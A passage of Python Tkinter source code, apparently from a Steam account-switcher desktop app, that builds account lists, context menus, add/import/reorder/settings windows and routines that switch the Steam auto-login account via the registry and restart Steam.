canvas.create_window((0, 0), height=h, width=310, window=buttonframe, anchor="nw")
canvas.configure(yscrollcommand=scroll_bar.set)
canvas.configure(width=self.button_frame.winfo_width(), height=self.button_frame.winfo_height())
def _on_mousewheel(event):
'''Scroll window on mousewheel input'''
widget = event.widget.winfo_containing(event.x_root, event.y_root)
if 'disabled' not in scroll_bar.state() and '!canvas' in str(widget):
canvas.yview_scroll(int(-1*(event.delta/120)), "units")
buttonframe.bind("<Configure>", lambda event,
canvas=canvas: onFrameConfigure(canvas))
self.bind("<MouseWheel>", _on_mousewheel)
elif self.accounts:
canvas = tk.Canvas(self.button_frame, borderwidth=0, highlightthickness=0)
canvas.config(bg=self['bg'])
buttonframe = tk.Frame(canvas)
scroll_bar = ttk.Scrollbar(self.button_frame,
orient="vertical",
command=canvas.yview)
for username in self.accounts:
steam64_list, account_name, persona_name = loginusers()
if username in account_name:
i = account_name.index(username)
else:
i = None
try:
acc_index = self.accounts.index(username)
profilename = self.acc_dict[acc_index]['customname']
except KeyError: # No custom name set
if i is not None: # i could be 0 so we can't use if i:
profilename = persona_name[i]
else:
profilename = _('Profile name not available')
finally:
if i is not None: # i could be 0 so we can't use if i:
steam64 = steam64_list[i]
image = steam64
else:
steam64 = None
image = 'default'
profilename = profilename[:30]
# We have to make a menu for every account! Sounds ridiculous? Me too.
if SYS_LOCALE == 'ko_KR':
menu_font = tkfont.Font(self, size=9, family='맑은 고딕')
menu_dict[username] = tk.Menu(self, tearoff=0, font=menu_font)
else:
menu_dict[username] = tk.Menu(self, tearoff=0)
menu_dict[username].add_command(label=_("Set as auto-login account"),
command=lambda name=username: self.button_func(name))
menu_dict[username].add_separator()
if i is not None: # i could be 0 so we can't use if i:
menu_dict[username].add_command(label=_('Open profile in browser'),
command=lambda steamid64=steam64: os.startfile(f'https://steamcommunity.com/profiles/{steamid64}'))
menu_dict[username].add_command(label=_('Open screenshots folder'),
command=lambda steamid64=steam64: open_screenshot(steamid64))
menu_dict[username].add_command(label=_('View SteamID'),
command=lambda username=username, steamid64=steam64: steamid_window(self, username, steamid64, self.popup_geometry(270, 180)))
menu_dict[username].add_command(label=_('Update avatar'),
command=lambda steamid64=steam64: self.update_avatar(steamid_list=[steamid64]))
menu_dict[username].add_separator()
menu_dict[username].add_command(label=_("Name settings"),
command=lambda name=username, pname=profilename: self.configwindow(name))
menu_dict[username].add_command(label=_("Delete"),
command=lambda name=username: self.remove_user(name))
def popup(username, event):
menu_dict[username].tk_popup(event.x_root + 86, event.y_root + 13, 0)
self.button_dict[username] = AccountButton(buttonframe,
username=username,
profilename=profilename,
command=lambda name=username: self.button_func(name),
rightcommand=lambda event, username=username: popup(username, event),
image=image)
if username == fetch_reg('AutoLoginUser'):
self.button_dict[username].disable(no_fade=True)
self.button_dict[username].pack(fill='x')
tk.Frame(buttonframe, bg=get_color('seperator')).pack(fill='x')
scroll_bar.pack(side="right", fill="y")
canvas.pack(side="left", fill='both', expand=True)
h = 49 * len(self.accounts)
canvas.create_window((0, 0), height=h, width=295, window=buttonframe, anchor="nw")
canvas.configure(yscrollcommand=scroll_bar.set)
canvas.configure(width=self.button_frame.winfo_width(), height=self.button_frame.winfo_height())
def _on_mousewheel(event):
'''Scroll window on mousewheel input'''
widget = event.widget.winfo_containing(event.x_root, event.y_root)
if 'disabled' not in scroll_bar.state() and '!canvas' in str(widget):
canvas.yview_scroll(int(-1*(event.delta/120)), "units")
buttonframe.bind("<Configure>", lambda event,
canvas=canvas: onFrameConfigure(canvas))
self.bind("<MouseWheel>", _on_mousewheel)
else:
self.no_user_frame.pack(side='top', fill='both', expand=True)
no_user = tk.Label(self.no_user_frame, text=_('No accounts added'), bg=self['bg'], fg=get_color('text'))
self.unbind("<MouseWheel>")
no_user.pack(pady=(150, 0))
def refresh(self, no_frame=False):
'''Refresh main window widgets'''
self.accounts = acc_getlist()
self.acc_dict = acc_getdict()
if not no_frame:
self.no_user_frame.destroy()
self.button_frame.destroy()
self.button_frame = tk.Frame(self, bg=get_color('bottomframe'))
self.button_frame.pack(side='top', fill='both', expand=True)
self['bg'] = get_color('window_background')
self.bottomframe.configure(bg=get_color('bottomframe'))
self.button_toggle.update_color()
self.button_exit.update_color()
self.button_restart.update_color()
self.upper_frame.configure(bg=get_color('upperframe'))
self.userlabel_1.configure(bg=self.upper_frame['bg'], fg=get_color('text'))
self.userlabel_2.configure(bg=self.upper_frame['bg'], fg=get_color('text'))
update_frame_color()
if fetch_reg('RememberPassword') == 1:
self.auto_var.set(_('Auto-login Enabled'))
auto_color = get_color('autologin_text_on')
else:
self.auto_var.set(_('Auto-login Disabled'))
auto_color = get_color('autologin_text_off')
self.autolabel.configure(bg=self.upper_frame['bg'], fg=auto_color)
if self.demo_mode:
self.user_var.set('username0')
else:
self.user_var.set(fetch_reg('AutoLoginUser'))
if self.demo_mode:
self.auto_var.set(_('Auto-login Enabled'))
elif fetch_reg('RememberPassword') == 1:
self.auto_var.set(_('Auto-login Enabled'))
else:
self.auto_var.set(_('Auto-login Disabled'))
self.draw_button()
if get_config('autoexit') == 'true':
self.restartbutton_text.set(_('Restart Steam & Exit'))
else:
self.restartbutton_text.set(_('Restart Steam'))
print('Menu refreshed with %s account(s)' % len(self.accounts))
def update_avatar(self, steamid_list=None, no_ui=False):
label = tk.Label(self, text=_('Please wait while downloading avatars...'), bg=self['bg'], fg=get_color('text'))
if not no_ui:
self.no_user_frame.destroy()
self.button_frame.destroy()
hide_update()
self.bottomframe.pack_forget()
label.pack(expand=True)
self.update()
if steamid_list:
dl_list = steamid_list
else:
dl_list = []
steamid_list, accountname, __ = loginusers()
for index, steamid in enumerate(steamid_list):
if accountname[index] in self.accounts:
dl_list.append(steamid)
download_avatar(dl_list)
if not no_ui:
label.destroy()
self.refresh(no_frame=True)
self.bottomframe.pack(side='bottom', fill='x')
show_update()
def about(self, version, force_copyright=False):
'''Open about window'''
if LOCALE == 'fr_FR':
height = 200
else:
height = 180
aboutwindow = tk.Toplevel(self, bg='white')
aboutwindow.title(_('About'))
aboutwindow.geometry(self.popup_geometry(360, height))
aboutwindow.resizable(False, False)
aboutwindow.focus()
aboutwindow.bind('<Escape>', lambda event: aboutwindow.destroy())
try:
aboutwindow.iconbitmap('asset/icon.ico')
except tk.TclError:
pass
about_disclaimer = tk.Label(aboutwindow, bg='white', fg='black',
text=_('Warning: The developer of this application is not responsible for\n' +
'data loss or any other damage from the use of this app.'))
about_steam_trademark = tk.Label(aboutwindow, bg='white', fg='black',
text=_('STEAM is a registered trademark of Valve Corporation.'))
if self.BUNDLE or force_copyright:
copyright_label = tk.Label(aboutwindow, bg='white', fg='black',
text='Copyright (c) 2020 sw2719 | All Rights Reserved\n' +
'View copyright notice for details')
else:
copyright_label = tk.Label(aboutwindow, bg='white', fg='black',
text='Copyright (c) 2020 sw2719 | All Rights Reserved\n' +
'View LICENSE file for details')
ver = tk.Label(aboutwindow, bg='white', fg='black',
text='Steam Account Switcher | Version ' + version)
def copyright_notice():
cprightwindow = tk.Toplevel(aboutwindow, bg='white')
cprightwindow.title(_('Copyright notice'))
cprightwindow.geometry(self.popup_geometry(630, 350, multiplier=2))
cprightwindow.resizable(False, False)
cprightwindow.focus()
cprightwindow.bind('<Escape>', lambda event: cprightwindow.destroy())
ttk.Button(cprightwindow, text=_('Close'), command=cprightwindow.destroy).pack(side='bottom', pady=3)
ttk.Separator(cprightwindow, orient=tk.HORIZONTAL).pack(side='bottom', fill='x')
cpright_text = ScrolledText(cprightwindow, bd=1, relief='flat')
with open('asset/COPYRIGHT_NOTICE', encoding='utf-8') as txt:
cpright_text.insert(tk.CURRENT, txt.read())
cpright_text.configure(state=tk.DISABLED)
cpright_text.pack(side='top', expand=True, fill='both')
button_frame = tk.Frame(aboutwindow, bg='white')
button_frame.pack(side='bottom', pady=5)
button_close = ttk.Button(button_frame,
text=_('Close'),
command=aboutwindow.destroy)
button_github = ttk.Button(button_frame,
text=_('GitHub page'),
command=lambda: os.startfile('https://github.com/sw2719/steam-account-switcher'))
button_copyright = ttk.Button(button_frame,
text=_('Copyright notice'),
command=copyright_notice)
button_frame.grid_columnconfigure(0, weight=1)
button_frame.grid_columnconfigure(1, weight=1)
button_frame.grid_columnconfigure(2, weight=1)
button_frame.grid_rowconfigure(0, weight=1)
about_disclaimer.pack(pady=8)
about_steam_trademark.pack()
copyright_label.pack(pady=5)
ver.pack()
button_close.grid(row=0, column=0, padx=2)
button_github.grid(row=0, column=1, padx=2)
if self.BUNDLE or force_copyright:
button_copyright.grid(row=0, column=2, padx=2)
def refreshwindow(self):
'''Open remove accounts window'''
accounts = acc_getlist()
if not accounts:
msgbox.showinfo(_('No Accounts'),
_("There's no account added."))
return
refreshwindow = tk.Toplevel(self, bg='white')
refreshwindow.title(_("Refresh"))
refreshwindow.geometry(self.popup_geometry(230, 320))
refreshwindow.resizable(False, False)
refreshwindow.bind('<Escape>', lambda event: refreshwindow.destroy())
refreshwindow.grab_set()
refreshwindow.focus()
try:
refreshwindow.iconbitmap('asset/icon.ico')
except tk.TclError:
pass
bottomframe_rm = tk.Frame(refreshwindow, bg='white')
bottomframe_rm.pack(side='bottom')
removelabel = tk.Label(refreshwindow, text=_('Select accounts to refresh.'), bg='white')
removelabel.pack(side='top', padx=5, pady=5)
def close():
refreshwindow.destroy()
def onFrameConfigure(canvas):
canvas.configure(scrollregion=canvas.bbox("all"))
canvas = tk.Canvas(refreshwindow, borderwidth=0, highlightthickness=0, bg='white')
check_frame = tk.Frame(canvas, bg='white')
scroll_bar = ttk.Scrollbar(refreshwindow,
orient="vertical",
command=canvas.yview)
canvas.configure(yscrollcommand=scroll_bar.set)
scroll_bar.pack(side="right", fill="y")
canvas.pack(side="left", fill="both", expand=True)
canvas.create_window((4, 4), window=check_frame, anchor="nw")
def _on_mousewheel(event):
'''Scroll window on mousewheel input'''
if 'disabled' not in scroll_bar.state():
canvas.yview_scroll(int(-1*(event.delta/120)), "units")
check_frame.bind("<Configure>", lambda event,
canvas=canvas: onFrameConfigure(canvas))
canvas.bind("<MouseWheel>", _on_mousewheel)
check_dict = {}
s = ttk.Style()
s.configure('check.TCheckbutton', background='white')
for v in accounts:
tk_var = tk.IntVar()
checkbutton = ttk.Checkbutton(check_frame,
text=v,
variable=tk_var,
style='check.TCheckbutton')
checkbutton.bind("<MouseWheel>", _on_mousewheel)
checkbutton.pack(side='top', padx=2, anchor='w')
check_dict[v] = tk_var
def refreshuser():
refreshwindow.destroy()
to_refresh = []
current_user = fetch_reg('AutoLoginUser')
for v in accounts:
if check_dict.get(v).get() == 1:
to_refresh.append(v)
else:
continue
self.withdraw()
msgbox.showinfo('', _('Accounts with expired autologin token will show login prompt.') + '\n\n' +
_('Close the prompt or login to continue the process.')) # NOQA
popup = tk.Toplevel(self, bg='white')
popup.title('')
popup.geometry(self.popup_geometry(180, 100))
popup.resizable(False, False)
popup_var = tk.StringVar()
popup_var.set(_('Initializing...'))
popup_uservar = tk.StringVar()
popup_uservar.set('---------')
popup_label = tk.Label(popup, textvariable=popup_var, bg='white')
popup_user = tk.Label(popup, textvariable=popup_uservar, bg='white')
popup_label.pack(pady=17)
popup_user.pack()
self.update()
for username in accounts:
if username in to_refresh:
popup_uservar.set(username)
popup_var.set(_('Switching account...'))
self.update()
setkey('AutoLoginUser', username, winreg.REG_SZ)
if username == accounts[-1] and username == current_user:
legacy_restart(silent=False)
else:
legacy_restart()
while fetch_reg('pid') == 0:
sleep(1)
popup_var.set(_('Waiting for Steam...'))
self.update()
while True: # Wait for Steam to log in
sleep(1)
if fetch_reg('ActiveUser') != 0:
sleep(4)
break
popup.destroy()
self.update()
if current_user != fetch_reg('AutoLoginUser'):
if msgbox.askyesno('', _('Do you want to start Steam with previous autologin account?')):
setkey('AutoLoginUser', current_user, winreg.REG_SZ)
legacy_restart(silent=False)
else:
subprocess.run("start steam://open/main", shell=True)
self.deiconify()
self.refresh()
refresh_cancel = ttk.Button(bottomframe_rm,
text=_('Cancel'),
command=close,
width=9)
refresh_ok = ttk.Button(bottomframe_rm,
text=_('Refresh'),
command=refreshuser,
width=9)
refresh_cancel.pack(side='left', padx=5, pady=3)
refresh_ok.pack(side='left', padx=5, pady=3)
def addwindow(self):
'''Open add accounts window'''
accounts = acc_getlist()
acc_dict = acc_getdict()
steamid_list, account_name, persona_name = loginusers()
x, y = self.get_window_pos()
addwindow = tk.Toplevel(self, bg='white')
addwindow.title(_("Add"))
addwindow.geometry(self.popup_geometry(300, 150))
addwindow.resizable(False, False)
addwindow.bind('<Escape>', lambda event: addwindow.destroy())
try:
addwindow.iconbitmap('asset/icon.ico')
except tk.TclError:
pass
topframe_add = tk.Frame(addwindow, bg='white')
topframe_add.pack(side='top', anchor='center')
bottomframe_add = tk.Frame(addwindow, bg='white')
bottomframe_add.pack(side='bottom', anchor='e', fill='x')
addlabel_row1 = tk.Label(topframe_add, bg='white',
text=_('Enter account(s) to add.'))
addlabel_row2 = tk.Label(topframe_add, bg='white',
text=_("In case of adding multiple accounts,") + '\n' +
_("seperate each account with '/' (slash)."))
account_entry = ttk.Entry(bottomframe_add, width=29)
addwindow.grab_set()
addwindow.focus()
account_entry.focus()
def disable_close():
pass
def adduser(userinput):
'''Write accounts from user's input to accounts.yml
:param userinput: Account names to add
'''
nonlocal acc_dict
dl_list = []
if userinput.strip():
name_buffer = userinput.split("/")
accounts_to_add = [name.strip() for name in name_buffer if name.strip()]
for name_to_write in accounts_to_add:
if name_to_write not in accounts:
acc_dict[len(acc_dict)] = {'accountname': name_to_write}
if name_to_write in account_name:
dl_list.append(steamid_list[account_name.index(name_to_write)])
else:
print(f'Account {name_to_write} already exists!')
msgbox.showinfo(_('Duplicate Alert'),
_('Account %s already exists.')
% name_to_write)
with open('accounts.yml', 'w') as acc:
yaml = YAML()
yaml.dump(acc_dict, acc)
if dl_list and get_config('show_avatar') == 'true':
button_addcancel.destroy()
bottomframe_add.destroy()
topframe_add.destroy()
addwindow.protocol("WM_DELETE_WINDOW", disable_close)
addwindow.focus()
tk.Label(addwindow, text=_('Please wait while downloading avatars...'), bg='white').pack(fill='both', expand=True)
self.update()
download_avatar(dl_list)
self.refresh()
addwindow.destroy()
def close():
addwindow.destroy()
def enterkey(event):
adduser(account_entry.get())
addwindow.bind('<Return>', enterkey)
button_add = ttk.Button(bottomframe_add, width=10, text=_('Add'),
command=lambda: adduser(account_entry.get()))
button_addcancel = ttk.Button(addwindow, width=10,
text=_('Cancel'), command=close)
addlabel_row1.pack(pady=10)
addlabel_row2.pack()
account_entry.pack(side='left', padx=(3, 0), pady=3, fill='x', expand=True)
button_add.pack(side='right', anchor='e', padx=3, pady=3)
button_addcancel.pack(side='bottom', anchor='e', padx=3)
def importwindow(self):
'''Open import accounts window'''
accounts = acc_getlist()
acc_dict = acc_getdict()
steamid_list, account_name, persona_name = loginusers()
if set(account_name).issubset(set(acc_getlist())):
msgbox.showinfo(_('Info'), _("There's no account left to import."))
return
s = ttk.Style()
s.configure('Import.TCheckbutton', background='white')
x, y = self.get_window_pos()
importwindow = tk.Toplevel(self, bg='white')
importwindow.title(_("Import"))
importwindow.geometry(self.popup_geometry(280, 300))
importwindow.resizable(False, False)
importwindow.grab_set()
importwindow.focus()
importwindow.bind('<Escape>', lambda event: importwindow.destroy())
try:
importwindow.iconbitmap('asset/icon.ico')
except tk.TclError:
pass
bottomframe_imp = tk.Frame(importwindow, bg='white')
bottomframe_imp.pack(side='bottom')
import_label = tk.Label(importwindow, text=_('Select accounts to import.') + '\n' +
_("Added accounts don't show up."),
bg='white')
import_label.pack(side='top', padx=5, pady=5)
def close():
importwindow.destroy()
def disable_close():
pass
def onFrameConfigure(canvas):
'''Reset the scroll region to encompass the inner frame'''
canvas.configure(scrollregion=canvas.bbox("all"))
canvas = tk.Canvas(importwindow, borderwidth=0, highlightthickness=0, background='white')
check_frame = tk.Frame(canvas, bg='white')
scroll_bar = ttk.Scrollbar(importwindow, orient="vertical", command=canvas.yview,)
canvas.configure(yscrollcommand=scroll_bar.set)
scroll_bar.pack(side="right", fill="y")
canvas.pack(side="left", fill="both", expand=True)
canvas.create_window((4, 4), window=check_frame, anchor="nw")
check_frame.bind("<Configure>", lambda event,
canvas=canvas: onFrameConfigure(canvas))
def _on_mousewheel(event):
'''Scroll window on mousewheel input'''
if 'disabled' not in scroll_bar.state():
canvas.yview_scroll(int(-1*(event.delta/120)), "units")
canvas.bind("<MouseWheel>", _on_mousewheel)
checkbox_dict = {}
for index, username in enumerate(account_name):
if username not in accounts:
int_var = tk.IntVar()
checkbutton = ttk.Checkbutton(check_frame,
text=username + f' ({persona_name[index]})',
variable=int_var,
style='Import.TCheckbutton')
checkbutton.bind("<MouseWheel>", _on_mousewheel)
checkbutton.pack(side='top', padx=2, anchor='w')
checkbox_dict[username] = int_var
def import_user():
nonlocal acc_dict
dl_list = []
for key, value in checkbox_dict.items():
if value.get() == 1:
acc_dict[len(acc_dict)] = {'accountname': key}
dl_list.append(steamid_list[account_name.index(key)])
with open('accounts.yml', 'w') as acc:
yaml = YAML()
yaml.dump(acc_dict, acc)
if get_config('show_avatar') == 'true':
canvas.destroy()
import_label.destroy()
scroll_bar.destroy()
import_cancel['state'] = 'disabled'
import_ok['state'] = 'disabled'
importwindow.protocol("WM_DELETE_WINDOW", disable_close)
importwindow.focus()
tk.Label(importwindow, text=_('Please wait while downloading avatars...'), bg='white').pack(fill='both', expand=True)
self.update()
download_avatar(dl_list)
self.refresh()
close()
import_cancel = ttk.Button(bottomframe_imp,
text=_('Cancel'),
command=close,
width=9)
import_ok = ttk.Button(bottomframe_imp,
text=_('Import'),
command=import_user,
width=9)
import_cancel.pack(side='left', padx=5, pady=3)
import_ok.pack(side='left', padx=5, pady=3)
def orderwindow(self):
'''Open order change window'''
accounts = acc_getlist()
if not accounts:
msgbox.showinfo(_('No Accounts'),
_("There's no account added."))
return
x, y = self.get_window_pos()
orderwindow = tk.Toplevel(self, bg='white')
orderwindow.title("")
orderwindow.geometry(self.popup_geometry(224, 270))
orderwindow.resizable(False, False)
orderwindow.bind('<Escape>', lambda event: orderwindow.destroy())
try:
orderwindow.iconbitmap('asset/icon.ico')
except tk.TclError:
pass
bottomframe = tk.Frame(orderwindow, bg='white')
bottomframe.pack(side='bottom', padx=3, pady=3)
labelframe = tk.Frame(orderwindow, bg='white')
labelframe.pack(side='bottom', padx=3)
orderwindow.grab_set()
orderwindow.focus()
lbframe = tk.Frame(orderwindow, bg='white')
scrollbar = ttk.Scrollbar(lbframe)
scrollbar.pack(side='right', fill='y')
lb = DragDropListbox(lbframe, width=35, height=20,
highlightthickness=0,
yscrollcommand=scrollbar.set,
bd=1,
relief='solid')
scrollbar["command"] = lb.yview
def _on_mousewheel(event):
'''Scroll window on mousewheel input'''
lb.yview_scroll(int(-1*(event.delta/120)), "units")
lb.bind("<MouseWheel>", _on_mousewheel)
lb.pack(side='left')
for i, v in enumerate(accounts):
lb.insert(i, v)
lb.select_set(0)
lbframe.pack(side='top', padx=3, pady=(3, 5), expand=True)
def down():
i = lb.curselection()[0]
if i == lb.size() - 1:
return
x = lb.get(i)
lb.delete(i)
lb.insert(i+1, x)
lb.select_set(i+1)
def up():
i = lb.curselection()[0]
if i == 0:
return
x = lb.get(i)
lb.delete(i)
lb.insert(i-1, x)
lb.select_set(i-1)
def apply():
acc_dict = acc_getdict()
order = lb.get(0, tk.END)
print('New order is', order)
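# Rebuild the account dict so its integer keys follow the new listbox order.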
buffer_dict = {}
for item in acc_dict.items():
i = order.index(item[1]['accountname'])
buffer_dict[i] = item[1]
dump_dict = {}
for x in range(len(buffer_dict)):
dump_dict[x] = buffer_dict[x]
with open('accounts.yml', 'w') as acc:
yaml = YAML()
yaml.dump(dump_dict, acc)
self.refresh()
def close():
orderwindow.destroy()
def ok():
apply()
close()
button_ok = ttk.Button(bottomframe,
width=9, text=_('OK'), command=ok)
button_ok.pack(side='left', padx=(0, 1))
button_cancel = ttk.Button(bottomframe,
width=9, text=_('Cancel'), command=close)
button_cancel.pack(side='left', padx=(1, 1.5))
button_up = ttk.Button(bottomframe, width=3,
text='↑', command=up)
button_up.pack(side='right', padx=(1.5, 1))
button_down = ttk.Button(bottomframe, width=3,
text='↓', command=down)
button_down.pack(side='right', padx=(1, 0))
def settingswindow(self):
'''Open settings window'''
global image1
global image2
global image3
global image4
config_dict = get_config('all')
last_config = config_dict
if LOCALE == 'fr_FR':
width = 330
ui_padx = 70
theme_padx = 50
else:
width = 260
ui_padx = 35
theme_padx = 40
settingswindow = tk.Toplevel(self, bg='white')
settingswindow.title(_("Settings"))
settingswindow.geometry(self.popup_geometry(width, 430)) # 260 is original
settingswindow.resizable(False, False)
settingswindow.bind('<Escape>', lambda event: settingswindow.destroy())
try:
settingswindow.iconbitmap('asset/icon.ico')
except tk.TclError:
pass
bottomframe_set = tk.Frame(settingswindow, bg='white')
bottomframe_set.pack(side='bottom')
settingswindow.grab_set()
settingswindow.focus()
if LOCALE == 'fr_FR':
padx_int = 45
elif LOCALE == 'en_US':
padx_int = 11
else:
padx_int = 24
localeframe = tk.Frame(settingswindow, bg='white')
localeframe.pack(side='top', pady=(14, 7), fill='x')
locale_label = tk.Label(localeframe, text=_('Language'), bg='white')
locale_label.pack(side='left', padx=(padx_int, 13))
locale_cb = ttk.Combobox(localeframe,
state="readonly",
values=['English', # 0
'한국어 (Korean)', # 1
'Français (French)']) # 2
current_locale = config_dict['locale']
if current_locale == 'en_US':
locale_cb.current(0)
elif current_locale == 'ko_KR':
locale_cb.current(1)
elif current_locale == 'fr_FR':
locale_cb.current(2)
locale_cb.pack(side='left')
restart_frame = tk.Frame(settingswindow, bg='white')
restart_frame.pack(side='top')
s = ttk.Style()
s.configure('Settings.TRadiobutton', background='white')
s.configure('Settings.TCheckbutton', background='white')
ui_frame = tk.Frame(settingswindow, bg='white')
ui_frame.pack(side='top', pady=(5, 5), fill='x')
ui_radio_var = tk.IntVar()
list_radio_frame = tk.Frame(ui_frame, bg='white')
list_radio_frame.pack(side='left', padx=(ui_padx, 0))
list_canvas = tk.Canvas(list_radio_frame, width=30, height=30, bg='white', bd=0, highlightthickness=0)
list_img = Image.open("asset/list.png").resize((30, 30))
image1 = ImageTk.PhotoImage(list_img)
list_canvas.create_image(15, 15, image=image1)
list_canvas.pack(side='top', padx=0, pady=5)
radio_list = ttk.Radiobutton(list_radio_frame,
text=_('List Mode'),
variable=ui_radio_var,
value=0,
style='Settings.TRadiobutton')
radio_list.pack(side='top', pady=2)
ToolTipWindow(radio_list, _('Display accounts in vertical list.'), center=True)
grid_radio_frame = tk.Frame(ui_frame, bg='white')
grid_radio_frame.pack(side='right', padx=(0, ui_padx))
grid_canvas = tk.Canvas(grid_radio_frame, width=30, height=30, bg='white', bd=0, highlightthickness=0)
grid_img = Image.open("asset/grid.png").resize((30, 30))
image2 = ImageTk.PhotoImage(grid_img)
grid_canvas.create_image(15, 15, image=image2)
grid_canvas.pack(side='top', padx=0, pady=5)
radio_grid = ttk.Radiobutton(grid_radio_frame,
text=_('Grid Mode'),
variable=ui_radio_var,
value=1,
style='Settings.TRadiobutton')
radio_grid.pack(side='top', pady=2)
ToolTipWindow(radio_grid, _('Display accounts in 3 x n grid.'), center=True)
if get_config('ui_mode') == 'grid':
ui_radio_var.set(1)
avatar_frame = tk.Frame(settingswindow, bg='white')
avatar_frame.pack(fill='x', side='top', padx=12, pady=(2, 5))
avatar_chkb = ttk.Checkbutton(avatar_frame, style='Settings.TCheckbutton',
text=_('Show avatar images'))
avatar_chkb.state(['!alternate'])
if config_dict['show_avatar'] == 'true':
avatar_chkb.state(['selected'])
else:
avatar_chkb.state(['!selected'])
avatar_chkb.pack(side='top')
def on_list_check():
avatar_chkb.state(['!disabled'])
def on_grid_check():
avatar_chkb.state(['selected'])
avatar_chkb.state(['disabled'])
if ui_radio_var.get() == 1:
on_grid_check()
radio_list['command'] = on_list_check
radio_grid['command'] = on_grid_check
theme_frame = tk.Frame(settingswindow, bg='white')
theme_frame.pack(side='top', pady=(5, 5), fill='x')
theme_radio_var = tk.IntVar()
light_radio_frame = tk.Frame(theme_frame, bg='white')
light_radio_frame.pack(side='left', padx=(theme_padx, 0))
light_canvas = tk.Canvas(light_radio_frame, width=40, height=64, bg='white', bd=0, highlightthickness=0)
light_img = Image.open("asset/light.png").resize((40, 64))
image3 = ImageTk.PhotoImage(light_img)
light_canvas.create_image(20, 32, image=image3)
light_canvas.pack(side='top', padx=0, pady=5)
radio_light = ttk.Radiobutton(light_radio_frame,
text=_('Light Theme'),
variable=theme_radio_var,
value=0,
style='Settings.TRadiobutton')
radio_light.pack(side='top', pady=2)
dark_radio_frame = tk.Frame(theme_frame, bg='white')
dark_radio_frame.pack(side='right', padx=(0, theme_padx))
dark_canvas = tk.Canvas(dark_radio_frame, width=40, height=64, bg='white', bd=0, highlightthickness=0)
dark_img = Image.open("asset/dark.png").resize((40, 64))
image4 = ImageTk.PhotoImage(dark_img)
dark_canvas.create_image(20, 32, image=image4)
dark_canvas.pack(side='top', padx=0, pady=5)
radio_dark = ttk.Radiobutton(dark_radio_frame,
text=_('Dark Theme'),
variable=theme_radio_var,
value=1,
style='Settings.TRadiobutton')
radio_dark.pack(side='top', pady=2)
ToolTipWindow(radio_dark, _('Dark theme is applied only to main window.'), center=True)
if get_config('theme') == 'dark':
theme_radio_var.set(1)
mode_radio_frame1 = tk.Frame(settingswindow, bg='white')
mode_radio_frame1.pack(side='top', padx=12, pady=(7, 2), fill='x')
mode_radio_frame2 = tk.Frame(settingswindow, bg='white')
mode_radio_frame2.pack(side='top', padx=12, pady=(2, 7), fill='x')
mode_radio_var = tk.IntVar()
radio_normal = ttk.Radiobutton(mode_radio_frame1,
text=_('Normal Mode (Manually restart Steam)'),
variable=mode_radio_var,
value=0,
style='Settings.TRadiobutton')
radio_normal.pack(side='left', pady=2)
ToolTipWindow(radio_normal, _("Restart Steam by clicking on 'Restart Steam' button."))
radio_express = ttk.Radiobutton(mode_radio_frame2,
text=_('Express Mode (Auto-restart Steam)'),
variable=mode_radio_var,
value=1,
style='Settings.TRadiobutton')
radio_express.pack(side='left', pady=2)
ToolTipWindow(radio_express, _("Automatically restart Steam when autologin account is changed."))
if get_config('mode') == 'express':
mode_radio_var.set(1)
softshutdwn_frame = tk.Frame(settingswindow, bg='white')
softshutdwn_frame.pack(fill='x', side='top', padx=12, pady=(7, 5))
soft_chkb = ttk.Checkbutton(softshutdwn_frame, style='Settings.TCheckbutton',
text=_('Try to soft shutdown Steam client'))
soft_chkb.state(['!alternate'])
if config_dict['try_soft_shutdown'] == 'true':
soft_chkb.state(['selected'])
else:
soft_chkb.state(['!selected'])
soft_chkb.pack(side='left')
autoexit_frame = tk.Frame(settingswindow, bg='white')
autoexit_frame.pack(fill='x', side='top', padx=12, pady=(5, 0))
autoexit_chkb = ttk.Checkbutton(autoexit_frame, style='Settings.TCheckbutton',
text=_('Exit app after Steam is restarted'))
autoexit_chkb.state(['!alternate'])
if config_dict['autoexit'] == 'true':
autoexit_chkb.state(['selected'])
else:
autoexit_chkb.state(['!selected'])
autoexit_chkb.pack(side='left')
def close():
settingswindow.destroy()
def apply():
'''Write new config values to config.txt'''
nonlocal config_dict
nonlocal current_locale
locale = ('en_US', 'ko_KR', 'fr_FR')
if ui_radio_var.get() == 1:
ui_mode = 'grid'
else:
ui_mode = 'list'
if theme_radio_var.get() == 1:
theme = 'dark'
else:
theme = 'light'
if mode_radio_var.get() == 1:
mode = 'express'
else:
mode = 'normal'
if 'selected' in soft_chkb.state():
soft_shutdown = 'true'
else:
soft_shutdown = 'false'
if 'selected' in autoexit_chkb.state():
autoexit = 'true'
else:
autoexit = 'false'
if 'selected' in avatar_chkb.state():
avatar = 'true'
else:
avatar = 'false'
config_dict = {'locale': locale[locale_cb.current()],
'autoexit': autoexit,
'mode': mode,
'try_soft_shutdown': soft_shutdown,
'show_avatar': avatar,
'last_pos': get_config('last_pos'),
'steam_path': get_config('steam_path'),
'ui_mode': ui_mode,
'theme': theme}
config_write_dict(config_dict)
if last_config['show_avatar'] == 'false' and 'selected' in avatar_chkb.state():
if msgbox.askyesno('', _('Do you want to download avatar images now?')):
self.update_avatar(no_ui=True)
if current_locale != locale[locale_cb.current()]:
self.after(100, lambda: msgbox.showinfo(_('Locale has been changed'),
_('Restart app to apply new locale settings.')))
current_locale = locale[locale_cb.current()]
self.refresh()
def ok():
apply()
close()
settings_ok = ttk.Button(bottomframe_set,
text=_('OK'),
command=ok,
width=10)
settings_cancel = ttk.Button(bottomframe_set,
text=_('Cancel'),
command=close,
width=10)
settings_apply = ttk.Button(bottomframe_set,
text=_('Apply'),
command=apply,
width=10)
settings_ok.pack(side='left', padx=3, pady=3)
settings_cancel.pack(side='left', padx=3, pady=3)
settings_apply.pack(side='left', padx=3, pady=3)
def exit_after_restart(self, refresh_override=False, silent=True):
'''Restart Steam client and exit application.
If autoexit is disabled, app won't exit.'''
label_var = tk.StringVar()
def forcequit():
print('Hard shutdown mode')
subprocess.run("TASKKILL /F /IM Steam.exe",
creationflags=0x08000000, check=True)
print('TASKKILL command sent.')
self.no_user_frame.destroy()
self.button_frame.destroy()
hide_update()
self.bottomframe.pack_forget()
button_frame = tk.Frame(self, bg=self['bg'])
button_frame.pack(side='bottom', fill='x')
cancel_button = SimpleButton(button_frame,
text=_('Cancel'))
force_button = SimpleButton(button_frame,
text=_('Force quit Steam'),
command=forcequit)
cancel_button.disable(no_fade=True)
force_button.disable(no_fade=True)
def enable_button():
cancel_button.enable()
force_button.enable()
cancel_button.pack(side='bottom', padx=3, pady=3, fill='x')
force_button.pack(side='bottom', padx=3, fill='x')
label_var = tk.StringVar()
label_var.set(_('Initializing...'))
